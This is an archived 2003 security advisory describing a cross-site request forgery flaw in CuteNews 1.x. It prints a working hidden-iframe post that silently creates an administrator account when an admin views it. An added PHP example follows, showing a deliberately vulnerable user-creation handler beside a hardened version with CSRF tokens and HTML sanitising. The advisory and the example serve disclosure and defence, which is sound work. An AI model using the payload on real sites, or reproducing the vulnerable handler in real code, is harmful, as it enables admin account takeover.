Vulnwatch mailing list archives
Admin Account Creation Vulnerability in CuteNews 1.x
From: "Peter Winter-Smith" <peter4020 () hotmail com>
Date: Sun, 29 Jun 2003 09:04:58 +0000
Admin Account Creation Vulnerability in CuteNews 1.x

Url: http://www.cutephp.com

CuteNews is an efficient, user-friendly and well designed news system which is both easy to set up and doesn't even require SQL to function, instead creating its own databases. It supports multiple user levels, such as Journalist (3), Editor (2) and Administrator (1), and has taken precautions to ensure that field injection cannot alter the user level, by placing the user level at the start of the database, rather than after any given field.

It does however allow the minor users to post HTML content in their posts, which could lead to cross site scripting cookie 'stealing', but luckily the creator has only stored MD5 hashes of the password, so that accounts cannot be directly stolen.

It appears however that CuteNews does not filter urls relating to the site itself, or rather the CuteNews control panel. Therefore, if a user was to inject the correct commands into a news article in a hidden IFRAME, or some such control, then upon the administrator browsing to the news page after having signed in to CuteNews the commands would be executed and the administrator would be none the wiser.

Example:

--------------------------------[Start Post]-------------------------------
Blah, blah, welcome to site.com, etc.<iframe src="index.php?regusername=owned&regpassword=pass&regnickname=owned&regemail=none () none com&reglevel=1&action=adduser&mod=editusers" height=0 width=0 frameborder=0 scrolling=0></iframe>
---------------------------------[End Post]--------------------------------

If the above data was posted on the news page, the administrator accounts would be able to execute the command without any notification at all. That URL in particular adds an administrator account with the username 'owned' and the password 'pass'.

================================================================

Operating system and servicepack level: Any operating system.
Software: CuteNews, PHP 4+
Under what circumstances the vulnerability was discovered: Messing around with CuteNews
If the vendor has been notified: Yes.
How to contact you for further information: I can always be reached at peter4020 () hotmail com
Please credit this find to: Peter Winter-Smith

Thank you for your time,
-Peter
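As an added illustration, and not CuteNews's own code or part of the original post, the PHP below contrasts a user-creation handler in the shape the advisory describes (an action selected by request parameters and authorised by nothing more than the administrator's session cookie, so a hidden iframe in a news post can drive it) with a hardened version that refuses GET, checks a per-session CSRF token with a constant-time comparison, and strips active content from what lower-level users post. Every function name, the csrf_token field, the username rule and the in-memory $db array are assumptions made for the example.

```php
<?php
// Added example, not CuteNews code. Function names, the csrf_token field and
// the in-memory $db array are hypothetical.

session_start();

// --- Vulnerable shape: parameters from GET or POST ($_REQUEST) pick the action,
// --- and the only "authorisation" is that the request carried an admin session
// --- cookie. A hidden <iframe src="index.php?...&action=adduser&mod=editusers">
// --- rendered in the admin's browser satisfies that just as well as the admin.
function add_user_vulnerable(array $req, array $db): array
{
    if (($req['mod'] ?? '') === 'editusers' && ($req['action'] ?? '') === 'adduser') {
        $db[$req['regusername']] = [
            'level' => (int)$req['reglevel'],          // caller chooses level 1 = Administrator
            'pass'  => md5($req['regpassword']),       // MD5 as the advisory says CuteNews stored
        ];
    }
    return $db;
}

// --- Hardened version.
// A random per-session token that is embedded in the legitimate form; content
// loaded in an iframe from a news page cannot read the admin's session to obtain it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function add_user_hardened(string $method, array $post, array $db): array
{
    if ($method !== 'POST') {
        throw new RuntimeException('state-changing action must not be driven by GET');
    }
    // hash_equals avoids a timing side channel on the token comparison
    if (!hash_equals(csrf_token(), (string)($post['csrf_token'] ?? ''))) {
        throw new RuntimeException('missing or invalid CSRF token');
    }
    if (($post['mod'] ?? '') !== 'editusers' || ($post['action'] ?? '') !== 'adduser') {
        return $db;
    }
    $username = (string)($post['regusername'] ?? '');
    if (!preg_match('/^[A-Za-z0-9_]{3,32}$/', $username)) {   // assumed username rule
        throw new RuntimeException('bad username');
    }
    $db[$username] = [
        // clamp to the three levels the advisory names: 1 Administrator .. 3 Journalist
        'level' => max(1, min(3, (int)($post['reglevel'] ?? 3))),
        'pass'  => password_hash((string)($post['regpassword'] ?? ''), PASSWORD_DEFAULT),
    ];
    return $db;
}

// --- Second layer: strip active content from Journalist/Editor posts so the
// --- page the administrator views cannot carry a hidden frame or script.
function sanitize_post_html(string $html): string
{
    // elements with their content
    $html = preg_replace('#<(iframe|frame|object|embed|script)\b[^>]*>.*?</\1\s*>#is', '', $html);
    // stray or self-closing opening tags of the same elements
    $html = preg_replace('#<(iframe|frame|object|embed|script)\b[^>]*/?>#i', '', $html);
    // inline event handlers such as onload="..."
    $html = preg_replace('#\s+on\w+\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)#i', '', $html);
    return $html;
}

// The legitimate "add user" form includes a hidden input named csrf_token whose
// value is htmlspecialchars(csrf_token()); the handler is wired as:
//   $db = add_user_hardened($_SERVER['REQUEST_METHOD'], $_POST, $db);
```

Running the advisory's example post through sanitize_post_html() leaves only the visible text, and a request that reaches add_user_hardened() over GET, or over POST without the token, is rejected before any user is written. The two controls are independent: the token check closes the cross-site request even if some HTML slips past the sanitizer, and the sanitizer also covers the cookie-theft angle the advisory mentions.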